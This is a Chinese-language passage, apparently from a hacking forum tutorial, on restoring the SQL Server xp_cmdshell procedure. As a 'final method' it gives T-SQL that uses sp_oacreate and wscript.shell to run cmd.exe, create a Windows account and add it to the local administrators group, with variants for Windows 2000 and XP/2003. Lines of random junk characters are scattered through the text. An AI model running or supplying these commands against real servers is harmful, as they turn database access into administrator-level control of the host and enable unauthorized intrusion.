3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法：查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
: ^# Z: `& g0 k$ K3 Z  Z第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
0 f2 r5 s/ M& {6 z然后按F5键命令执行完毕
! r5 r; h% l+ H( M. `8 t
9 e- A% b. q# A/ n: Z: Z四.终极方法.
  ]) U0 E. N; v1 W如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
0 y$ P3 W9 Y+ t) W, h查询分离器连接后,
2 A: y$ R2 ~  I* w2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
6 I# `! x; E! B
+ X8 ]; `( e  Z9 N  ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
" P+ ?8 s8 g; ]) z) P' \( k
' m( @" g5 _* l1 m: j* zxp或2003server系统:
& Z/ A9 U, P" t4 k' D  H2 B- B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'